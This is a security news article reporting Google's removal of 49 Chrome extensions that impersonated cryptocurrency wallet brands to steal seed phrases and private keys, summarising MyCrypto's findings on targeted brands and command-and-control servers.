Google has removed 49 malicious Chrome browser extensions from its Web Store that contained codes used for hijacking cryptocurrency and stealing sensitive information.
Cybersecurity researchers at MyCrypto and PhishFort discovered a range of malicious Chrome extensions targeting brands and cryptocurrency users. Google removed the malicious extensions within 24 hours.
Some of the extensions have had Fake 5-star ratings and positive feedbacks, most of which were banal comments such as “good,” “helpful app,” or “legit extension” written by a network of fake users.
According to MyCrypto, the way these extensions function remains the same; however, the cryptocurrency brands they abuse vary depending on the user they are targeting.
Names such as Ledger, MyEtherWallet, and Trezor are among the brands targeted by the malicious extensions with Ledger being the most targeted brand.
|Ledger||<https://www.ledger.com/>||57% of malicious browser extensions in the MyCrypto dataset|
|Trezor||<https://trezor.io/>||8% of malicious browser extensions in the MyCrypto dataset|
|Jaxx||<https://jaxx.io/>||2% of malicious browser extensions in the MyCrypto dataset|
|Electrum||<https://electrum.org/>||4% of malicious browser extensions in the MyCrypto dataset|
|<https://myetherwallet.com>||22% of malicious browser extensions in the MyCrypto dataset|
|KeepKey||https://shapeshift.io/keepkey/||4% of malicious browser extensions in the MyCrypto dataset|
According to MyCrypto, the number of malicious extensions released in store has immensely increased from 2.04% in February to 63.26% releases in April.
How threat actors operate
Threat actors use the Chrome extensions to steal mnemonic phrases, private keys, and keystore files.
“Once the user has entered them, the extension sends an HTTP POST request to its backend, where the bad actors receive the secrets and empty the accounts.”
Not all secrets submitted to the malicious extensions were swept; according to MyCrypto, the reason is either bad actors are only interested in high-value accounts, or they have to manually sweep accounts.
The researchers have discovered 14 unique command & control (C2) servers; some specific C2 servers have fingerprints linked to other servers meaning that they have the same actor(s) behind them.
“Some kits sent the phished data back to a GoogleDocs form. However, most hosted their own backend with custom PHP scripts.” MyCrypto experts explain.
“Whilst some of the domains are relatively old, 80% of the C2s were registered in March and April 2020 (an even split). The oldest domain (ledger.productions) has the most “connections” to other C2s in terms of fingerprints, so we have some indication of the same backend kit (or same actors behind this) for the majority of the extensions.” Continue the report.
This is not the first time Chrome extensions were targeted
Threat actors have abused Google Chrome extensions before; back in February, Google found over 500 chrome extensions used to inject malicious ads and siphon off user browsing data and sending them back to servers controlled by attackers. These extensions have been downloaded millions of times from Google’s Chrome Web Store.
Secure Your Organization’s Mind with Securemind.se